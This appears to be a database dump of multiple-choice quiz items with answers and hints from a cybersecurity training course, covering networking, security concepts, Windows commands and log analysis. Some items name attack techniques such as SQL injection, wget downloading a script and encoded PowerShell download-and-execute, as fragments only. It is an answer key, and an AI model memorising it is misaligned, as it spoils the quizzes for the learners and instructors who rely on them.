(5350, 25, 'The first address in a subnet is used for what?', 3, 'Network ID', 0, 'Identification', '2025-12-26 20:53:36', '[\"Broadcast\", \"Gateway\", \"Network ID\", \"DNS\"]'),
(5351, 26, 'Which record maps a name to an IPv4 address?', 1, 'A', 0, 'Address', '2025-12-26 20:53:36', '[\"AAAA\", \"CNAME\", \"A\", \"MX\"]'),
(5352, 26, 'Which record is used for email server delivery?', 2, 'MX', 0, 'Mail Exchange', '2025-12-26 20:53:36', '[\"TXT\", \"PTR\", \"MX\", \"NS\"]'),
(5353, 26, 'What translates domain names to IPs?', 3, 'DNS', 0, 'System name', '2025-12-26 20:53:36', '[\"DHCP\", \"ARP\", \"DNS\", \"NAT\"]'),
(5354, 27, 'What is the first step in the DHCP process?', 1, 'Discover', 0, 'Looking for server', '2025-12-26 20:53:36', '[\"Offer\", \"Request\", \"Discover\", \"Acknowledge\"]'),
(5355, 27, 'What does ARP resolution map?', 2, 'IP to MAC', 0, 'Logical to Physical', '2025-12-26 20:53:36', '[\"MAC to IP\", \"IP to MAC\", \"URL to IP\", \"Port to Protocol\"]'),
(5356, 27, 'What attack relies on faking ARP replies?', 3, 'ARP Spoofing', 0, 'MITM', '2025-12-26 20:53:36', '[\"DNS Poisoning\", \"ARP Spoofing\", \"DDoS\", \"Phishing\"]'),
(5357, 28, 'Which port is used for Secure Shell (SSH)?', 1, '22', 0, 'Encrypted CLI', '2025-12-26 20:53:36', '[\"21\", \"22\", \"23\", \"25\"]'),
(5358, 28, 'Which protocol is UNSAFE for remote administration?', 2, 'Telnet', 0, 'Cleartext', '2025-12-26 20:53:36', '[\"SSH\", \"RDP\", \"HTTPS\", \"Telnet\"]'),
(5359, 28, 'Port 445 is associated with which service?', 3, 'SMB', 0, 'Windows Sharing', '2025-12-26 20:53:36', '[\"FTP\", \"SMB\", \"DNS\", \"HTTP\"]'),
(5363, 30, 'What protocol exposed the password?', 1, 'HTTP', 0, 'Unsecure', '2025-12-26 20:53:36', '[\"HTTPS\", \"SSH\", \"SFTP\", \"HTTP\"]'),
(5364, 30, 'What was the stolen password in the scenario?', 2, 'SuperSecret123', 0, 'Plaintext', '2025-12-26 20:53:36', '[\"admin\", \"password\", \"123456\", \"SuperSecret123\"]'),
(5365, 30, 'How should this login be secured?', 3, 'Use HTTPS', 0, 'Encryption', '2025-12-26 20:53:36', '[\"Use Telnet\", \"Use HTTPS\", \"Change Port\", \"Use UDP\"]'),
(5366, 31, 'Which device connects different networks (Layer 3)?', 1, 'Router', 0, 'Routing decisions', '2025-12-26 20:53:36', '[\"Switch\", \"Hub\", \"Router\", \"Bridge\"]'),
(5367, 31, 'What is the loopback address for localhost?', 2, '127.0.0.1', 0, 'Home', '2025-12-26 20:53:36', '[\"192.168.1.1\", \"0.0.0.0\", \"127.0.0.1\", \"10.0.0.1\"]'),
(5368, 31, 'Which command typically checks connectivity?', 3, 'ping', 0, 'ICMP Echo', '2025-12-26 20:53:36', '[\"ipconfig\", \"ping\", \"netstat\", \"nslookup\"]'),
(5369, 31, 'What is the subnet mask for a /24 network?', 4, '255.255.255.0', 0, 'Class C default', '2025-12-26 20:53:36', '[\"255.0.0.0\", \"255.255.0.0\", \"255.255.255.0\", \"255.255.255.255\"]'),
(5370, 31, 'Which port is used by HTTP?', 5, '80', 0, 'Unencrypted Web', '2025-12-26 20:53:36', '[\"21\", \"80\", \"443\", \"25\"]'),
(5371, 31, 'Which port is used by HTTPS?', 6, '443', 0, 'Encrypted Web', '2025-12-26 20:53:36', '[\"80\", \"8080\", \"443\", \"8443\"]'),
(5372, 31, 'Which port is used by DNS?', 7, '53', 0, 'Name Resolution', '2025-12-26 20:53:36', '[\"23\", \"53\", \"67\", \"110\"]'),
(5373, 31, 'What is Layer 1 of the OSI Model?', 8, 'Physical', 0, 'Cables and bits', '2025-12-26 20:53:36', '[\"Application\", \"Data Link\", \"Physical\", \"Transport\"]'),
(5374, 31, 'How long is a standard MAC address?', 9, '48 bits', 0, 'Hardware address', '2025-12-26 20:53:36', '[\"32 bits\", \"48 bits\", \"64 bits\", \"128 bits\"]'),
(5375, 31, 'How long is an IPv6 address?', 10, '128 bits', 0, 'Modern IP', '2025-12-26 20:53:36', '[\"32 bits\", \"64 bits\", \"128 bits\", \"256 bits\"]'),
(5376, 31, 'Which protocol guarantees delivery of data?', 11, 'TCP', 0, 'Reliable', '2025-12-26 20:53:36', '[\"UDP\", \"IP\", \"TCP\", \"ICMP\"]'),
(5377, 31, 'What is the first step in the TCP Handshake?', 12, 'SYN', 0, 'Hello', '2025-12-26 20:53:36', '[\"ACK\", \"SYN\", \"SYN-ACK\", \"FIN\"]'),
(5378, 31, 'What is the first step in DHCP?', 13, 'Discover', 0, 'Looking for IP', '2025-12-26 20:53:36', '[\"Offer\", \"Request\", \"Acknowledge\", \"Discover\"]'),
(5379, 31, 'Which of the following is a private IP address?', 14, '192.168.1.50', 0, 'RFC 1918', '2025-12-26 20:53:36', '[\"8.8.8.8\", \"1.1.1.1\", \"172.50.1.1\", \"192.168.1.50\"]'),
(5380, 31, 'What does ARP do?', 15, 'Resolves IP to MAC', 0, 'Address Resolution', '2025-12-26 20:53:36', '[\"Resolves MAC to IP\", \"Resolves Name to IP\", \"Resolves IP to MAC\", \"Routes Packets\"]'),
(5381, 31, 'Which protocol is used for ping?', 16, 'ICMP', 0, 'Internet Control Message', '2025-12-26 20:53:36', '[\"TCP\", \"UDP\", \"ICMP\", \"ARP\"]'),
(5382, 31, 'Which Layer 2 device uses MAC addresses to forward frames?', 17, 'Switch', 0, 'Intelligent forwarding', '2025-12-26 20:53:36', '[\"Hub\", \"Router\", \"Switch\", \"Repeater\"]'),
(5383, 31, 'Which DNS record type stores IPv6 addresses?', 18, 'AAAA', 0, 'Quad A', '2025-12-26 20:53:36', '[\"A\", \"MX\", \"AAAA\", \"CNAME\"]'),
(5384, 31, 'What port does standard FTP use?', 19, '21', 0, 'File Transfer', '2025-12-26 20:53:36', '[\"20\", \"21\", \"22\", \"23\"]'),
(5385, 31, 'What is the primary purpose of Wireshark?', 20, 'Packet Capture', 0, 'Analysis', '2025-12-26 20:53:36', '[\"Password Cracking\", \"Packet Capture\", \"Virus Scanning\", \"Routing\"]'),
(5427, 40, 'What does the \"C\" in CIA stand for?', 1, 'Confidentiality', 0, 'Privacy', '2025-12-26 20:58:02', '[\"Control\", \"Confidentiality\", \"Certification\", \"Compliance\"]'),
(5428, 40, 'Which concept ensures data is not altered?', 2, 'Integrity', 0, 'Accuracy', '2025-12-26 20:58:02', '[\"Availability\", \"Integrity\", \"Confidentiality\", \"Authentication\"]'),
(5429, 40, 'A DDoS attack primarily targets which pillar?', 3, 'Availability', 0, 'Uptime', '2025-12-26 20:58:02', '[\"Integrity\", \"Confidentiality\", \"Availability\", \"Authorization\"]'),
(5430, 41, 'Which is \"Something You Are\"?', 1, 'Biometrics', 0, 'Body part', '2025-12-26 20:58:02', '[\"Password\", \"Smart Card\", \"Biometrics\", \"Location\"]'),
(5431, 41, 'Which fits \"Something You Have\"?', 2, 'Smart Card', 0, 'Physical token', '2025-12-26 20:58:02', '[\"PIN\", \"Password\", \"Smart Card\", \"Typing Speed\"]'),
(5432, 41, 'Using a Password and a Fingerprint is an example of what?', 3, 'MFA', 0, 'Multi-Factor', '2025-12-26 20:58:02', '[\"Single Sign On\", \"MFA\", \"Authorization\", \"Encryption\"]'),
(5433, 42, 'Which comes first?', 1, 'Authentication', 0, 'Who are you?', '2025-12-26 20:58:02', '[\"Authorization\", \"Authentication\", \"Accounting\", \"Auditing\"]'),
(5434, 42, 'Which model uses security labels (Top Secret)?', 2, 'MAC', 0, 'Mandatory', '2025-12-26 20:58:02', '[\"DAC\", \"RBAC\", \"MAC\", \"ABAC\"]'),
(5435, 42, 'The principle of giving minimum necessary rights is called?', 3, 'Least Privilege', 0, 'Minimal', '2025-12-26 20:58:02', '[\"Zero Trust\", \"Least Privilege\", \"Defense in Depth\", \"Separation of Duties\"]'),
(5436, 43, 'Which AAA component tracks user actions?', 1, 'Accounting', 0, 'Logs', '2025-12-26 20:58:02', '[\"Authentication\", \"Authorization\", \"Accounting\", \"Access\"]'),
(5437, 43, 'Preventing a user from checking or denying an action is called?', 2, 'Non-Repudiation', 0, 'Undeniable', '2025-12-26 20:58:02', '[\"Integrity\", \"Encryption\", \"Non-Repudiation\", \"Availability\"]'),
(5438, 43, 'What is a primary use of Accounting logs?', 3, 'Forensics', 0, 'Investigation', '2025-12-26 20:58:02', '[\"Speed\", \"Encryption\", \"Forensics\", \"Routing\"]'),
(5439, 44, 'Which encryption uses the SAME key for locking and unlocking?', 1, 'Symmetric', 0, 'Single Key', '2025-12-26 20:58:02', '[\"Asymmetric\", \"Symmetric\", \"Hashing\", \"Public Key\"]'),
(5440, 44, 'Which algorithm is the current gold standard for symmetric encryption?', 2, 'AES', 0, 'Advanced Encryption Standard', '2025-12-26 20:58:02', '[\"DES\", \"AES\", \"MD5\", \"RSA\"]'),
(5441, 44, 'What is Plaintext?', 3, 'Readable data', 0, 'Unencrypted', '2025-12-26 20:58:02', '[\"Ciphertext\", \"Hashed data\", \"Readable data\", \"Key\"]'),
(5442, 45, 'Is hashing reversible?', 1, 'No', 0, 'One-way function', '2025-12-26 20:58:02', '[\"Yes\", \"No\", \"Only with a key\", \"Only for admins\"]'),
(5443, 45, 'What is the primary goal of hashing?', 2, 'Integrity', 0, 'Fingerprinting', '2025-12-26 20:58:02', '[\"Confidentiality\", \"Availability\", \"Integrity\", \"Speed\"]'),
(5444, 45, 'Which hashing algorithm is considered secure today?', 3, 'SHA-256', 0, 'Standard', '2025-12-26 20:58:02', '[\"MD5\", \"SHA-1\", \"SHA-256\", \"ROT13\"]'),
(5445, 46, 'What is another name for Defense in Depth?', 1, 'Layered Security', 0, 'Onion', '2025-12-26 20:58:02', '[\"Single Point of Failure\", \"Layered Security\", \"Zero Trust\", \"Active Defense\"]'),
(5446, 46, 'Which layer involves educating users?', 2, 'Human', 0, 'Training', '2025-12-26 20:58:02', '[\"Physical\", \"Network\", \"Human\", \"Application\"]'),
(5447, 46, 'Why use multiple layers?', 3, 'Redundancy', 0, 'If one fails', '2025-12-26 20:58:02', '[\"Cost savings\", \"Redundancy\", \"Simplicity\", \"Speed\"]'),
(5448, 47, 'What fundamental triad models information security?', 1, 'CIA', 0, 'Confidentiality Integrity Availability', '2025-12-26 20:58:02', '[\"ABC\", \"CIA\", \"RGB\", \"SSH\"]'),
(5449, 47, 'Which element of CIA ensures systems are up and running?', 2, 'Availability', 0, 'Uptime', '2025-12-26 20:58:02', '[\"Confidentiality\", \"Integrity\", \"Availability\", \"Authentication\"]'),
(5450, 47, 'Fingerprints and Retina scans are examples of?', 3, 'Biometrics', 0, 'Something you are', '2025-12-26 20:58:02', '[\"Passwords\", \"Tokens\", \"Biometrics\", \"Smart Cards\"]'),
(5451, 47, 'Identifying a user is called?', 4, 'Authentication', 0, 'AuthN', '2025-12-26 20:58:02', '[\"Authorization\", \"Accounting\", \"Authentication\", \"Access\"]'),
(5452, 47, 'Determining what a user is allowed to do is?', 5, 'Authorization', 0, 'AuthZ', '2025-12-26 20:58:02', '[\"Authentication\", \"Accounting\", \"Authorization\", \"Auditing\"]'),
(5453, 47, 'Which access control model uses \"Top Secret\" labels?', 6, 'MAC', 0, 'Mandatory', '2025-12-26 20:58:02', '[\"DAC\", \"MAC\", \"RBAC\", \"Rule-Based\"]'),
(5454, 47, 'Which access control model relies on the data owner?', 7, 'DAC', 0, 'Discretionary', '2025-12-26 20:58:02', '[\"MAC\", \"DAC\", \"RBAC\", \"ABAC\"]'),
(5455, 47, 'Tracking user activities in logs is known as?', 8, 'Accounting', 0, 'The 3rd A', '2025-12-26 20:58:02', '[\"Authentication\", \"Authorization\", \"Accounting\", \"Analysis\"]'),
(5456, 47, 'Which type of encryption uses a Public and Private key?', 9, 'Asymmetric', 0, 'Two keys', '2025-12-26 20:58:03', '[\"Symmetric\", \"Asymmetric\", \"Hashing\", \"Linear\"]'),
(5457, 47, 'Which type of encryption uses a single shared key?', 10, 'Symmetric', 0, 'Faster', '2025-12-26 20:58:03', '[\"Asymmetric\", \"Symmetric\", \"Hashing\", \"Private\"]'),
(5458, 47, 'Which function is One-Way and non-reversible?', 11, 'Hashing', 0, 'Fingerprint', '2025-12-26 20:58:03', '[\"Encryption\", \"Encoding\", \"Hashing\", \"Compression\"]'),
(5459, 47, 'Which is a secure hashing algorithm?', 12, 'SHA-256', 0, 'Modern', '2025-12-26 20:58:03', '[\"MD5\", \"SHA-1\", \"SHA-256\", \"CRC32\"]'),
(5460, 47, 'What is the best defense against social engineering?', 13, 'User Training', 0, 'Human layer', '2025-12-26 20:58:03', '[\"Firewalls\", \"Encryption\", \"User Training\", \"Biometrics\"]'),
(5461, 47, 'Layering multiple security controls is called?', 14, 'Defense in Depth', 0, 'Onion', '2025-12-26 20:58:03', '[\"Offense in Depth\", \"Defense in Depth\", \"Single Defense\", \"Zero Security\"]'),
(5462, 47, 'What does Non-Repudiation provide?', 15, 'Proof of origin', 0, 'Cannot deny', '2025-12-26 20:58:03', '[\"Privacy\", \"Proof of origin\", \"Speed\", \"Availability\"]'),
(5463, 47, 'Which helps protect Data Integrity?', 16, 'Hashing', 0, 'Check change', '2025-12-26 20:58:03', '[\"Encryption\", \"Hashing\", \"Backups\", \"Firewalls\"]'),
(5464, 47, 'What does MFA stand for?', 17, 'Multi-Factor Authentication', 0, '2+ factors', '2025-12-26 20:58:03', '[\"Multi-Factor Authorization\", \"Multi-Function Access\", \"Multi-Factor Authentication\", \"Main Factor Auth\"]'),
(5465, 47, 'Is a password \"Something you have\"?', 18, 'No', 0, 'Something you know', '2025-12-26 20:58:03', '[\"Yes\", \"No\", \"Depends\", \"Sometimes\"]'),
(5466, 47, 'Which layer of Defense in Depth includes Firewalls?', 19, 'Network', 0, 'Perimeter', '2025-12-26 20:58:03', '[\"Physical\", \"Network\", \"Human\", \"Data\"]'),
(5467, 47, 'Which is NOT a pillar of the CIA triad?', 20, 'Authorization', 0, 'Not C-I-A', '2025-12-26 20:58:03', '[\"Confidentiality\", \"Integrity\", \"Availability\", \"Authorization\"]'),
(5483, 48, 'Which command lists files?', 1, 'dir', 0, 'Directory', '2025-12-26 21:05:12', '[\"ls\", \"list\", \"dir\", \"show\"]'),
(5484, 48, 'How do you enter the \"Documents\" folder?', 2, 'cd Documents', 0, 'Change Directory', '2025-12-26 21:05:12', '[\"dir Documents\", \"cd Documents\", \"enter Documents\", \"go Documents\"]'),
(5485, 48, 'What does \"cd ..\" do?', 3, 'Go back one level', 0, 'Parent directory', '2025-12-26 21:05:12', '[\"Deletes folder\", \"Go back one level\", \"Go to root\", \"Nothing\"]'),
(5486, 49, 'Which command reads a file content?', 1, 'type', 0, 'Type out', '2025-12-26 21:05:12', '[\"read\", \"cat\", \"type\", \"open\"]'),
(5487, 49, 'If you want to read \"note.txt\", what do you type?', 2, 'type note.txt', 0, 'Command + Arg', '2025-12-26 21:05:12', '[\"read note.txt\", \"type note.txt\", \"cat note.txt\", \"open note.txt\"]'),
(5488, 49, 'Is \"cat\" a standard Windows command?', 3, 'No', 0, 'type is used', '2025-12-26 21:05:12', '[\"Yes\", \"No\", \"Maybe\", \"Only in PowerShell\"]'),
(5489, 50, 'Which command shows the computer name?', 1, 'hostname', 0, 'Host', '2025-12-26 21:05:12', '[\"name\", \"hostname\", \"computername\", \"id\"]'),
(5490, 50, 'Which command shows the current user?', 2, 'whoami', 0, 'Identity', '2025-12-26 21:05:12', '[\"user\", \"me\", \"whoami\", \"id\"]'),
(5491, 50, 'Why is \"whoami\" important?', 3, 'To check permissions', 0, 'Privilege level', '2025-12-26 21:05:12', '[\"To check time\", \"To check IP\", \"To check permissions\", \"To list files\"]'),
(5492, 51, 'Which command shows IP details on Windows?', 1, 'ipconfig', 0, 'IP Config', '2025-12-26 21:05:12', '[\"ifconfig\", \"ipconfig\", \"ip a\", \"net config\"]'),
(5493, 51, 'What does Default Gateway usually represent?', 2, 'The Router', 0, 'Exit point', '2025-12-26 21:05:12', '[\"The PC\", \"The Router\", \"The Server\", \"The DNS\"]'),
(5494, 51, 'What is a common local IP starting with?', 3, '192.168', 0, 'Private range', '2025-12-26 21:05:12', '[\"8.8.8\", \"192.168\", \"1.1.1\", \"255.255\"]'),
(5495, 52, 'Which command lists running processes?', 1, 'tasklist', 0, 'List tasks', '2025-12-26 21:05:12', '[\"ps\", \"tasklist\", \"proclist\", \"top\"]'),
(5496, 52, 'What does PID stand for?', 2, 'Process ID', 0, 'Identifier', '2025-12-26 21:05:12', '[\"Program ID\", \"Process ID\", \"Personal ID\", \"Path ID\"]'),
(5497, 52, 'Which switch is used to kill by PID?', 3, '/PID', 0, 'Switch', '2025-12-26 21:05:12', '[\"-p\", \"/PID\", \"-id\", \"--pid\"]'),
(5522, 54, 'What is the severity level of the Challenge Log?', 1, 'ERROR', 0, 'Keyword after timestamp', '2025-12-26 21:12:59', '[\"INFO\", \"DEBUG\", \"ERROR\", \"FATAL\"]'),
(5523, 54, 'Which user was involved in the event?', 2, 'db_admin', 0, 'User field', '2025-12-26 21:12:59', '[\"alice\", \"admin\", \"db_admin\", \"root\"]'),
(5524, 54, 'What database was being accessed?', 3, 'users_db', 0, 'Accessing...', '2025-12-26 21:12:59', '[\"auth_db\", \"users_db\", \"main_db\", \"logs\"]'),
(5525, 55, 'How many failed attempts are shown?', 1, '2', 0, 'Count \"Failed\"', '2025-12-26 21:12:59', '[\"1\", \"2\", \"3\", \"0\"]'),
(5526, 55, 'Which user successfully logged in?', 2, 'root', 0, 'Look for \"Accepted\"', '2025-12-26 21:12:59', '[\"guest\", \"admin\", \"root\", \"user\"]'),
(5527, 55, 'What port is the SSH server running on?', 3, '2222', 0, 'port ...', '2025-12-26 21:12:59', '[\"22\", \"80\", \"2222\", \"443\"]'),
(5528, 56, 'What HTTP method was used in the challenge?', 1, 'POST', 0, 'First word inside quotes', '2025-12-26 21:12:59', '[\"GET\", \"POST\", \"PUT\", \"HEAD\"]'),
(5529, 56, 'What status code was returned?', 2, '401', 0, 'Number after HTTP version', '2025-12-26 21:12:59', '[\"200\", \"404\", \"401\", \"500\"]'),
(5530, 56, 'What page was requested?', 3, '/admin/login.php', 0, 'Path', '2025-12-26 21:12:59', '[\"/index.html\", \"/admin/login.php\", \"/login\", \"/home\"]'),
(5531, 57, 'What is the specific failure reason?', 1, 'Account locked out', 0, 'Read Failure Reason', '2025-12-26 21:12:59', '[\"Bad password\", \"Account locked out\", \"Unknown user\", \"Wrong domain\"]'),
(5532, 57, 'What is the Event ID?', 2, '4625', 0, 'Top line', '2025-12-26 21:12:59', '[\"4624\", \"4625\", \"4672\", \"1000\"]'),
(5533, 57, 'Which IP address initiated the request?', 3, '10.0.0.88', 0, 'Source Network Address', '2025-12-26 21:12:59', '[\"127.0.0.1\", \"10.0.0.88\", \"192.168.1.1\", \"0.0.0.0\"]'),
(5534, 58, 'What SQL command is visible in the URL?', 1, 'UNION SELECT', 0, 'Keyword', '2025-12-26 21:12:59', '[\"DROP TABLE\", \"UNION SELECT\", \"UPDATE\", \"INSERT\"]'),
(5535, 58, 'What does %27 represent in URL encoding?', 2, 'Single Quote (\')', 0, 'Hex for quote', '2025-12-26 21:12:59', '[\"Space\", \"Single Quote (\')\", \"Double Quote (\\\")\", \"Percent Sign\"]'),
(5536, 58, 'Did the server block this request?', 3, 'No (Status 200)', 0, 'Status code', '2025-12-26 21:12:59', '[\"Yes (403)\", \"No (Status 200)\", \"Yes (500)\", \"Maybe\"]'),
(5537, 59, 'What describes the destination port 3389?', 1, 'RDP (Remote Desktop)', 0, 'Common Port', '2025-12-26 21:12:59', '[\"SSH\", \"HTTP\", \"RDP (Remote Desktop)\", \"FTP\"]'),
(5538, 59, 'What flag indicates a connection attempt?', 2, 'SYN', 0, 'TCP Flag', '2025-12-26 21:12:59', '[\"ACK\", \"SYN\", \"FIN\", \"RST\"]'),
(5539, 59, 'Was the connection allowed?', 3, 'No (DROP)', 0, 'Action', '2025-12-26 21:12:59', '[\"Yes (ACCEPT)\", \"No (DROP)\", \"Logged only\", \"Unknown\"]'),
(5540, 60, 'What malicious command is being downloaded?', 1, 'malware.sh', 0, 'File name', '2025-12-26 21:12:59', '[\"virus.exe\", \"malware.sh\", \"test.txt\", \"config.php\"]'),
(5541, 60, 'What tool is used to download the file?', 2, 'wget', 0, 'Command', '2025-12-26 21:12:59', '[\"curl\", \"wget\", \"cat\", \"ping\"]'),
(5542, 60, 'What character is encoded as %7C?', 3, 'Pipe (|)', 0, 'Separator', '2025-12-26 21:12:59', '[\"Semicolon (;)\", \"Pipe (|)\", \"Ampersand (&)\", \"Space\"]'),
(5543, 61, 'What does the decoded command try to do?', 1, 'Download a script', 0, 'DownloadString', '2025-12-26 21:12:59', '[\"Delete files\", \"Download a script\", \"Encrypt drive\", \"Add user\"]'),
(5544, 61, 'What command is executed after downloading?', 2, 'IEX (Invoke-Expression)', 0, 'First word decoded', '2025-12-26 21:12:59', '[\"cmd.exe\", \"IEX (Invoke-Expression)\", \"Start-Process\", \"Write-Host\"]'),
(5545, 61, 'What parameter indicates the command is encoded?', 3, '-Enc', 0, 'Short for -EncodedCommand', '2025-12-26 21:12:59', '[\"-NoP\", \"-NonI\", \"-W\", \"-Enc\"]'),
(5546, 72, 'What describes a Forward Proxy?', 1, 'Acts for the client', 0, 'School/Work proxy', '2025-12-26 21:17:42', '[\"Acts for the server\", \"Acts for the client\", \"Is a VPN\", \"Is a firewall\"]'),
(5547, 72, 'What is the main role of an Intercepting Proxy?', 2, 'View/Modify traffic', 0, 'MitM', '2025-12-26 21:17:42', '[\"Speed up internet\", \"View/Modify traffic\", \"Encrypt data\", \"Host websites\"]'),
(5548, 72, 'What typically uses a Reverse Proxy?', 3, 'High traffic servers', 0, 'Load balancing', '2025-12-26 21:17:42', '[\"Home users\", \"High traffic servers\", \"Laptops\", \"Printers\"]'),
(5549, 73, 'What is Burp Suite primarily used for?', 1, 'Web Security Testing', 0, 'Hacking apps', '2025-12-26 21:17:42', '[\"Network Scanning\", \"Web Security Testing\", \"Password Management\", \"Virus Scanning\"]'),
(5550, 73, 'Which component allows modifying and re-sending individual requests?', 2, 'Repeater', 0, 'Repeat', '2025-12-26 21:17:42', '[\"Proxy\", \"Scanner\", \"Repeater\", \"Intruder\"]'),
(5551, 73, 'Which component is used for automated attacks?', 3, 'Intruder', 0, 'Brute force', '2025-12-26 21:17:42', '[\"Repeater\", \"Intruder\", \"Decoder\", \"Comparer\"]'),
(5552, 74, 'What happens when \"Intercept is On\"?', 1, 'Requests hang/pause', 0, 'Waiting for you', '2025-12-26 21:17:42', '[\"Requests go faster\", \"Requests hang/pause\", \"Browser closes\", \"Server errors\"]'),
(5553, 74, 'Why would you modify the User-Agent header?', 2, 'Pretend to be a specific device', 0, 'Mobile testing', '2025-12-26 21:17:42', '[\"To hack wifi\", \"Pretend to be a specific device\", \"To clear cache\", \"To speed up login\"]'),
(5554, 74, 'What allows you to send the paused request to the server?', 3, 'Forward button', 0, 'Action', '2025-12-26 21:17:42', '[\"Drop button\", \"Forward button\", \"Stop button\", \"Delete button\"]'),
(5555, 75, 'Why use Repeater instead of the browser?', 1, 'Faster iteration', 0, 'Testing variations', '2025-12-26 21:17:42', '[\"Better graphics\", \"Faster iteration\", \"Browser is blocked\", \"It is automatic\"]'),
(5556, 75, 'What does %20 represent in URL encoding?', 2, 'Space', 0, 'Whitespace', '2025-12-26 21:17:42', '[\"Tab\", \"Enter\", \"Space\", \"Slash\"]'),
(5557, 75, 'What tool converts Base64 back to text?', 3, 'Decoder', 0, 'Decode', '2025-12-26 21:17:42', '[\"Encoder\", \"Decoder\", \"Translator\", \"Compiler\"]'),
(5558, 76, 'What happens in a proxy chain?', 1, 'Traffic hops through multiple nodes', 0, 'A->B->C', '2025-12-26 21:17:42', '[\"Traffic is blocked\", \"Traffic hops through multiple nodes\", \"Traffic is deleted\", \"Traffic is faster\"]'),
(5559, 76, 'What is the main difference between Proxy and VPN?', 2, 'VPN encrypts entire device traffic', 0, 'Scope', '2025-12-26 21:17:42', '[\"Proxy is faster\", \"VPN is free\", \"VPN encrypts entire device traffic\", \"Proxy is hardware\"]'),
(5560, 76, 'If you chain A->B->C, who does the Target see?', 3, 'Proxy C', 0, 'The last one', '2025-12-26 21:17:42', '[\"You\", \"Proxy A\", \"Proxy B\", \"Proxy C\"]'),
(5693, 77, 'Which system is typically deployed \"Inline\"?', 1, 'IPS', 0, 'Intrusion Prevention', '2025-12-26 22:11:01', '[\"IDS\", \"IPS\", \"SIEM\", \"TAP\"]'),
(5694, 77, 'What happens if an Out-of-Band IDS crashes?', 2, 'Traffic continues (Fail Open)', 0, 'Loss of visibility only', '2025-12-26 22:11:01', '[\"Network outage\", \"Traffic continues (Fail Open)\", \"Firewall locks down\", \"Servers reboot\"]'),
(5695, 77, 'Why is IPS riskier than IDS?', 3, 'Can block legitimate traffic', 0, 'Business interruption', '2025-12-26 22:11:01', '[\"It is more expensive\", \"It is slower\", \"Can block legitimate traffic\", \"It uses more power\"]'),
(5696, 78, 'Which detection method is best for known threats?', 1, 'Signature-Based', 0, 'Fast and accurate', '2025-12-26 22:11:01', '[\"Anomaly-Based\", \"Signature-Based\", \"Heuristic\", \"AI\"]'),
(5697, 78, 'What is the main advantage of Anomaly detection?', 2, 'Detecting Zero-Days', 0, 'Unknown threats', '2025-12-26 22:11:01', '[\"Speed\", \"Low cost\", \"Detecting Zero-Days\", \"Low false positives\"]'),
(5698, 78, 'What triggers an anomaly alert?', 3, 'Deviation from baseline', 0, 'Unusual behavior', '2025-12-26 22:11:01', '[\"A signature match\", \"A blacklisted IP\", \"Deviation from baseline\", \"A specific file hash\"]'),
(5699, 79, 'What is the major blind spot of NIDS today?', 1, 'Encrypted Traffic (HTTPS)', 0, 'Encryption', '2025-12-26 22:11:01', '[\"Speed\", \"Encrypted Traffic (HTTPS)\", \"UDP Packets\", \"IPv6\"]'),
(5700, 79, 'Where does HIDS sit in the encryption chain?', 2, 'After decryption', 0, 'On the host', '2025-12-26 22:11:01', '[\"Before encryption\", \"After decryption\", \"In the router\", \"On the switch\"]'),
(5701, 79, 'Which capability is unique to HIDS?', 3, 'File Integrity Monitoring', 0, 'FIM', '2025-12-26 22:11:01', '[\"Packet Capture\", \"Flow Analysis\", \"File Integrity Monitoring\", \"DDoS Protection\"]'),
(5702, 81, 'How does Zeek primarily store data?', 1, 'Transaction Logs', 0, 'Metadata', '2025-12-26 22:11:01', '[\"Full Packet Capture\", \"Transaction Logs\", \"SQL Database\", \"Binary Blobs\"]'),
(5703, 81, 'Which log file contains the volume of data transferred?', 2, 'conn.log', 0, 'Connection', '2025-12-26 22:11:01', '[\"files.log\", \"conn.log\", \"http.log\", \"stats.log\"]'),
(5704, 81, 'Can Zeek detect anomalies in encrypted traffic?', 3, 'Yes (via metadata)', 0, 'Byte counts', '2025-12-26 22:11:01', '[\"No\", \"Yes (via metadata)\", \"Only if decrypted\", \"Never\"]'),
(5705, 82, 'What is the best way to tell if an attack succeeded?', 1, 'Check the Server Response', 0, 'Response Code', '2025-12-26 22:11:01', '[\"Check the Source IP\", \"Check the Server Response\", \"Check the Timestamp\", \"Check the Rule ID\"]'),
(5706, 82, 'If a payload appears in an email body triggering an alert, it is likely a?', 2, 'False Positive', 0, 'Context mismatch', '2025-12-26 22:11:01', '[\"True Positive\", \"False Positive\", \"Zero Day\", \"Insider Threat\"]'),
(5707, 82, 'A \"404 Not Found\" response generally indicates?', 3, 'Attempt Failed', 0, 'Target does not exist', '2025-12-26 22:11:01', '[\"Successful Hack\", \"Attempt Failed\", \"Server Offline\", \"IDS Failure\"]'),
(5708, 83, 'What is the standard solution for internal scanners triggering alerts?', 1, 'Whitelisting', 0, 'Ignoring IP', '2025-12-26 22:11:01', '[\"Blocking them\", \"Whitelisting\", \"Counter-attacking\", \"Disabling the IDS\"]'),
(5709, 83, 'What technique limits alerts to \"X times per minute\"?', 2, 'Thresholding', 0, 'Suppression', '2025-12-26 22:11:01', '[\"Whitelisting\", \"Thresholding\", \"Dropping\", \"Sampling\"]'),
(5710, 83, 'Why might P2P updates trigger alerts?', 3, 'Look like Botnet traffic', 0, 'Behavior', '2025-12-26 22:11:01', '[\"They are viruses\", \"Look like Botnet traffic\", \"They are unencrypted\", \"They are slow\"]'),
(5711, 84, 'What is the first step before you can scan?', 1, 'Discovery / Asset Management', 0, 'Knowing what to scan', '2025-12-26 22:11:01', '[\"Remediation\", \"Prioritization\", \"Discovery / Asset Management\", \"Reporting\"]'),
(5712, 84, 'Why is \"Verification\" necessary after patching?', 2, 'To ensure patch was applied correctly', 0, 'Trust but verify', '2025-12-26 22:11:01', '[\"It isn\'t\", \"To ensure patch was applied correctly\", \"To double billing\", \"To slow down IT\"]'),
(5713, 84, 'What is \"Shadow IT\"?', 3, 'Unknown/Unmanaged assets', 0, 'Hidden servers', '2025-12-26 22:11:01', '[\"Hacker tools\", \"Unknown/Unmanaged assets\", \"Dark mode\", \"VPNs\"]'),
(5714, 85, 'Which scan type is less accurate finding missing patches?', 1, 'Unauthenticated', 0, 'External', '2025-12-26 22:11:01', '[\"Authenticated\", \"Unauthenticated\", \"Agent-based\", \"Internal\"]'),
(5715, 85, 'How does an authenticated scan check for patches?', 2, 'Logs in and checks files/registry', 0, 'Commands', '2025-12-26 22:11:01', '[\"Guesses\", \"Checks headers\", \"Logs in and checks files/registry\", \"Port scan\"]'),
